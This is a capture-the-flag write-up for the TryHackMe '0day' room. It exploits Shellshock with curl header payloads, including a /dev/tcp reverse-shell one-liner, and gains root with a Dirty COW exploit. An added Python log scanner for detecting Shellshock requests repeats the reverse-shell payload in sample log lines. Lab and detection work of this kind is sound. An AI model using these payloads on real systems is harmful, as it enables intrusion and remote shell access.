This is the write-up for the room named 0day on TryHackMe.

The room can be found here: https://tryhackme.com/room/0day

Details given:

Exploit Ubuntu, like a Turtle in a Hurricane. Root my secure Website, take a step into the history of hacking.

What is required?:

user.txt and root.txt



As always, let's start by scanning the target with the IP given:

nmap -sC -sV

We have port 22 (SSH) and port 80 (web) open with the above versions. Let's enumerate port 80 further using Nikto.


nikto -h

The above Nikto scan reveals that this box is vulnerable to Shellshock. This is a very famous bug in Bash, and according to Wikipedia (https://en.wikipedia.org/wiki/Shellshock_(software_bug)):

Shellshock, also known as Bashdoor, is a family of security bugs in the Unix Bash shell, the first of which was disclosed on 24 September 2014. Shellshock could enable an attacker to cause Bash to execute arbitrary commands and gain unauthorized access to many Internet-facing services, such as web servers, that use Bash to process requests.

The Nikto scan also revealed a few interesting web directories like /admin, /backup and /secret. Let's keep that in mind; if required, we can come back to these directories later for further enumeration.

We can use cURL to enumerate further and test whether the target is actually vulnerable to Shellshock.


curl -H "Referer: () { test;}; echo 'Content-Type: text/plain'; echo; echo; /usr/bin/id; exit"

This outputs www-data as the user, confirming that it is exploitable using Shellshock.



Let's exploit Shellshock and get a reverse shell using the following command:

curl -v -H "Referer: () { test;}; echo 'Content-Type: text/plain'; echo; echo; /bin/bash -i >& /dev/tcp/ 0>&1"

We get our reverse shell and thus our user flag in ryan’s home directory: THM{Sh********_*****}
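On the defender's side, the requests above leave a clear trace: Apache's combined access log records the Referer and User-Agent headers, so the Bash function-definition prefix "() {" shows up verbatim. The following is an added example, not part of the original write-up, that flags such entries and raises the severity when the trailing command opens a connection or fetches a file; the log lines are constructed, the addresses are documentation ranges and /cgi-bin/example.cgi is a hypothetical path.

```python
import re

# Apache "combined" format: host ident user [time] "request" status bytes "referer" "agent"
COMBINED = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<agent>(?:[^"\\]|\\.)*)"$'
)
# Shellshock payloads begin with a Bash function definition; whitespace may vary.
FUNC_DEF = re.compile(r'\(\s*\)\s*\{')
# Trailing commands that connect out or download something deserve escalation.
ESCALATE = re.compile(r'/dev/tcp/|\b(?:wget|curl|nc)\b')


def scan(lines):
    """Return one finding per log line whose request, Referer or User-Agent
    contains a Bash function definition."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = COMBINED.match(line.strip())
        if not m:
            continue  # not in combined format, nothing to inspect
        for field in ("request", "referer", "agent"):
            value = m.group(field).replace('\\"', '"')  # Apache escapes quotes
            hit = FUNC_DEF.search(value)
            if hit:
                trailing = value[hit.end():]  # what Bash would run after the definition
                findings.append({
                    "line": n, "host": m.group("host"), "field": field,
                    "status": m.group("status"),
                    "severity": "high" if ESCALATE.search(trailing) else "probe",
                })
                break
    return findings


# Constructed sample log (not taken from the target).
SAMPLE_LOG = r'''
198.51.100.7 - - [22/Oct/2020:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 3025 "-" "Mozilla/5.0"
203.0.113.5 - - [22/Oct/2020:10:02:10 +0000] "GET /cgi-bin/example.cgi HTTP/1.1" 200 57 "() { test;}; echo 'Content-Type: text/plain'; echo; echo; /usr/bin/id; exit" "curl/7.72.0"
203.0.113.5 - - [22/Oct/2020:10:03:44 +0000] "GET /cgi-bin/example.cgi HTTP/1.1" 200 0 "() { test;}; echo 'Content-Type: text/plain'; echo; echo; /bin/bash -i >& /dev/tcp/203.0.113.5/4444 0>&1" "curl/7.72.0"
198.51.100.9 - - [22/Oct/2020:10:04:00 +0000] "GET /search?q=foo() HTTP/1.1" 200 812 "-" "Mozilla/5.0"
203.0.113.8 - - [22/Oct/2020:10:05:31 +0000] "GET /cgi-bin/example.cgi HTTP/1.1" 500 0 "-" "() { :; }; /usr/bin/id"
'''.strip().splitlines()

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The fourth line contains "()" without a following "{" and is correctly ignored; headers that the combined format does not log, such as Cookie, need a custom LogFormat or a WAF rule to be covered.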

Privilege Escalation


Use Linux Exploit Suggester from https://github.com/mzet-/linux-exploit-suggester/blob/master/linux-exploit-suggester.sh, which suggests that the box is vulnerable to the dirtyc0w vulnerability.

Again, this is a very famous vulnerability; read more details about it here: https://dirtycow.ninja/

This can be used for privilege escalation, and a working exploit that worked for this box is available here: https://gist.github.com/rverton/e9d4ff65d703a9084e85fa9df083c679

The target is an x64 machine, and we faced problems compiling the exploit on the target.

www-data@ubuntu:/tmp cat /proc/version
cat /proc/version
Linux version 3.13.0-32-generic (buildd@kissel) (gcc version 4.8.2 (Ubuntu 4.8.2-19ubuntu1) ) #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014

So compile the exploit locally on Kali and transfer it to the target.

└─$ gcc cowroot.c -o cowroot -pthread

Running ./cowroot on the target gives us a root shell and the root flag in /root: THM{g00d********************}

Originally published at https://basicpentesting.blogspot.com on October 22, 2020.




Software Developer having keen interest in Security, Privacy and Pen-testing. Certs:- Security+,PenTest+,AZ900
